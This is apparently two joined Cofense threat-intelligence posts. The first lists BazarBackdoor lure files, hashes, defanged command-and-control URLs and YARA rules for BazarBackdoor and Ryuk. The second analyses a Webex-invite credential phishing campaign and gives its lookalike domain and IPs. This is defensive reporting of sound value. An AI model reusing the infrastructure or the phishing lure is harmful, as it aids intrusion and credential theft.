hxxp://docs[.]google[.]com/document/d/e/2PACX-1vQ5-Kr-eOjPFeWs-MZR1Flspv0kBIQiQDeUyuTcXHHkZlEK6jDQDJnsIQqkAXQ9iRpIo5cRg73d7ztK/pub 
hxxp://docs[.]google[.]com/document/d/e/2PACX-1vQM6VfkT7hU3MM8KJQgY7E9BnnnMVuWLws1Sl0cGPh6a_9Me8u2YsWx_j4bL5iEHQyoMSMo54twwhV1/pub 
hxxp://docs[.]google[.]com/document/d/e/2PACX-1vQg_6O82GtGQVvwG0296E3SefhAcxhkWskkdVES3r-x774F3-kY4a6hQuYJC5SgKj3lOA2mrPx6BxGx/pub 
BazarBackdoor File  MD5 Hash 
Document3-90.exe  3826f8176445cc4291287f8aad28bb53 
Report10-9.exe  240bf9b477fe3d977acbb2726f0f12b5 
1.exe  b9e7cdd63db7ff765efeaabd0a85ca59 
2.exe  d3965ca520a87fc3ad3a874bb0bf118c 
AnnualReport.exe  ff9976d675cc1679b0b6e15323010dbf 
AnnualReport.exe  49c3639ad3cd29473e0bd047bcef8a64 
Document_Print.exe  925d730ddb4304a4bde4dfaeabb5c7b9 
Document-Preview.exe  40b17d4ca83f079cf6b2b09d7a7fd839 
t99.exe  df249304643531adb536eba89691ec91 
PreviewDoc.exe  a41429f7dbecfb76e6b7534afbeb4f74 
Preview.exe  9f00d78f2e8e4523773a264f85be1c02 
Preview.exe  5f64cc672ea13388797599b40a62d9be 
putty.exe  006f8bd0cd7e820705dec7bb3a7a7cf5 
XColorPickerXPTest.exe  cd6b9af8db078afe074b12a4fd0a5869 
PDOKGLWEER.exe  135f68e708cc04e362703ad71be5f620 
v152.exe  d55ec134a3046f289d9ebfdba1e98775 
BazarBackdoor Command 
hxxps://107[.]155[.]137[.]18/api/v150 
hxxps://107[.]155[.]137[.]18/api/v152 
hxxps://164[.]132[.]76[.]76/api/v12 
hxxps://164[.]68[.]107[.]165/api/v10 
hxxps://164[.]68[.]107[.]165/api/v12 
hxxps://185[.]99[.]2[.]196/api/v12 
hxxps://194[.]5[.]249[.]156/api/v10 
hxxps://195[.]123[.]241[.]175/api/v153 
hxxps://195[.]123[.]241[.]194/api/v153 
hxxps://212[.]22[.]70[.]4/api/v12 
hxxps://31[.]214[.]240[.]203/api/v150 
hxxps://31[.]214[.]240[.]203/api/v152 
hxxps://35[.]164[.]230[.]208/link/s 
hxxps://45[.]148[.]10[.]190/api/v150 
hxxps://45[.]148[.]10[.]190/api/v152 
hxxps://5[.]182[.]210[.]145/api/v10 
hxxps://5[.]182[.]210[.]145/api/v12 
hxxps://54[.]89[.]230[.]95/rest/t 
hxxps://68[.]183[.]214[.]30/api/v12 
hxxps://82[.]146[.]37[.]128/api/v150 
hxxps://82[.]146[.]37[.]128/api/v152 
hxxps://82[.]146[.]37[.]128/api/v153 
hxxps://82[.]146[.]37[.]128/api/v154 
hxxps://85[.]143[.]221[.]85/api/v100 
hxxps://85[.]143[.]221[.]85/api/v150 
hxxps://85[.]143[.]221[.]85/api/v152 
hxxps://85[.]143[.]221[.]85/api/v98 
hxxps://86[.]104[.]194[.]77/api/v10 
hxxps://86[.]104[.]194[.]77/api/v12 
hxxps://bubl6g[.]com:443/api/v202 
hxxps://bubl6g[.]com:443/api/v204 
hxxps://grumhit[.]com/z/report 
hxxps://onevdg[.]com/link/s 

Yara Rules for Campaign Detection 

Rule 1: 

rule PM_Intel_Ryuk_Payload_1029201 {
meta:
  description = “EDR rule for detecting Ryuk ransomware main payload”
strings:
  $ = “.RYK” wide nocase
$ = “RyukReadMe.html” wide nocase
$ = “UNIQUE_ID_DO_NOT_REMOVE” wide nocase
$ = “\\users\\Public\\finish” wide nocase
$ = “\\users\\Public\\sys” wide nocase
$ = “\\Documents and Settings\\Default User\\finish” wide nocase
$ = “\\Documents and Settings\\Default User\\sys” wide nocase
condition:
  uint16(0) == 0x5a4d and uint32(uint32(0x3c)) == 0x00004550 and all of
them
}  

Rule 2:¹ 

rule crime_win64_backdoor_bazarbackdoor1 {
meta:
description = “Detects BazarBackdoor injected 64-bit malware”
author = “@VK_Intel
reference = “https://twitter.com/pancak3lullz/status/1252303608747565057
tlp = “white”
date = “2020-04-24”
strings:
$str1 = “%id%”
$str2 = “%d”
$start = { 48 ?? ?? ?? ?? 57 48 83 ec 30 b9 01 00 00 00 e8 ?? ?? ?? ?? 84 c0 0f ?? ?? ?? ?? ?? 40 32 ff 40 ?? ?? ?? ?? e8 ?? ?? ?? ?? 8a d8 8b ?? ?? ?? ?? ?? 83 f9 01 0f ?? ?? ?? ?? ?? 85 c9 75 ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 85 c0 74 ?? b8 ff 00 00 00 e9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? eb ?? 40 b7 01 40 ?? ?? ?? ?? 8a cb e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? 48 8b d8 48 ?? ?? ?? 74 ??}
$server = {40 53 48 83 ec 20 48 8b d9 e8 ?? ?? ?? ?? 85 c0 75 ?? 0f ?? ?? ?? ?? ?? ?? 66 83 f8 50 74 ?? b9 bb 01 00 00 66 3b c1 74 ?? a8 01 74 ?? 48 8b cb e8 ?? ?? ?? ?? 84 c0 75 ?? 48 8b cb e8 ?? ?? ?? ?? b8 f6 ff ff ff eb ?? 33 c0 48 83 c4 20 5b c3}
condition:
( uint16(0) == 0x5a4d and ( 3 of them ) ) or ( all of them )
} 

¹Sourced from https://twitter.com/VK_Intel/status/1315663046694625286 and evaluated by Cofense Intelligence analysts. 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Online Leader Invites You to This Webex Phish

By Ashley Tran, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) team has identified a phishing campaign that attempts to harvest Webex credentials. This is not the first time we have seen an active Webex campaign, however, as we have noted before. It is actually an attack method that became increasingly common as non-essential workers were pushed into remote working conditions due to the pandemic. The previous Webex phish utilized implications of vulnerabilities and SSL certificate fixes for Webex, but this one takes a more subtle approach: acting as a Webex event invite.

Figure 1: Email Body 

The email shown in Figure 1 looks like a relatively normal Webex event invite at a glance. This email is a simple Webex invite that anyone who uses Webex may be accustomed to. This invite says that the user has been invited to the event “Leadership&Muscles,” the host is “Online Leader” and, although it is vague, the mentions of “Leadership” and “Online Leader” may have most users determine this has to do with work and  without typical phishing language urging them to join  many may not feel so threatened; they may opt to join the meeting out of curiosity.  

And should a user think to hover-check the button to “join a meeting,” the URL that will show as a preview will be:  hxxp://idbrokerwebex[.]com 

Despite the threat actor’s attempts to make this email seem legitimate, however, the subject of the email already appears off compared to what is seen in the body – a Portuguese subject paired with an English body? If that does not reveal the true nature of this email then the threat actor’s carelessness with the From and Sender fields will. Although it is obvious there was an attempt to make the email appear as though it is coming from Webex with the inclusion of “[email protected],” the real sender email is next to it: americacentral02[@]eliteddi[.]com.

Looking into the domain eliteddi.com, we can see that it was recently registered, as seen in Figure 2.  

Figure 2: Domain Registration Information for eliteddi.com 

This was perhaps done in a bid to give themselves a domain to use for sending emails. When utilizing their own registered domains, this gives the threat actor a legitimate DKIM, SPF and DMARC to bypass resources.  This domain was presumably also used as practice in setting up this attack because, as noted in Figure 3, the domain is also the host to the same Webex phish. Because the domain eliteddi[.]com is not part of the actual email itself, and isn’t actually a part that a user would typically interact with, it can be assumed that this domain was part of the threat actor’s practice attempt before launching this attack.

Figure 3: Webex phish found on the sender domain eliteddi[.]com  

Taking a look at the URL found embedded into the email itself we can see that this URL looks much more legitimate than the one seen in the threat actor’s practice attempts. This fraudulent domain was also recently registered according to information found on its corresponding WhoIs record, as seen in Figure 4. 

Figure 4: Domain information for idbrokerwebex[.]com 

One thing to note for this fraudulent domain is that the threat actor has tried to mimic a real Webex URL, one that is typically just a quick redirect when logging into Webex Teams, but would still be a familiar site to users. The small difference between the legitimate and the phishing URLs, though, is a simple “.” separating idbroker from webex – a small mistaken mistype of a user trying to get to this domain can lead to a huge mistake in this case. 

The phish itself can be noted in Figure 2.

Figure 5-6: Phishing Page 

The Webex phish similar to this has utilized the same template when phishing for credentials, essentially a perfect copy of Webex’s login page. This page does not have any noticeable flaws in grammar anywhere or weird formatting. In fact, even the URL in the address bar does not give anything away immediately should a user glance at it for any sort of validation.  

Compared to the phishing page seen hosted on the threat actor’s “practice” domain noted above, this one actually has a certificate for the site that, in turn, adds a lock in the address bar which, to most, indicates that a site is “secure. This is a relatively common addition, especially with the use of website builders that give creators a certificate to work with. However, as noted numerous times in other blogs, threat actors are using that perception to trick users into trusting their phishing attacks. 

The second step of this attack can be noted in Figures 7-8. This step acts more as a distraction mechanism, as the page looks like any other Webex event registration page. Here the user would input any amount of information as long as the fields are required, then move on to the final confirmation page. While this page is more than likely just an attempt to put any suspicions the user had initially to rest, this page also has the potential to garner more information about the user. 

Figure 7-8: “Event” Registration 

Indicators of Compromise 

Network IOC   IP   
hxxp://eliteddi[.]com  192.185.214.103 
hxxp://idbrokerwebex[.]com  216.172.161.34 
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.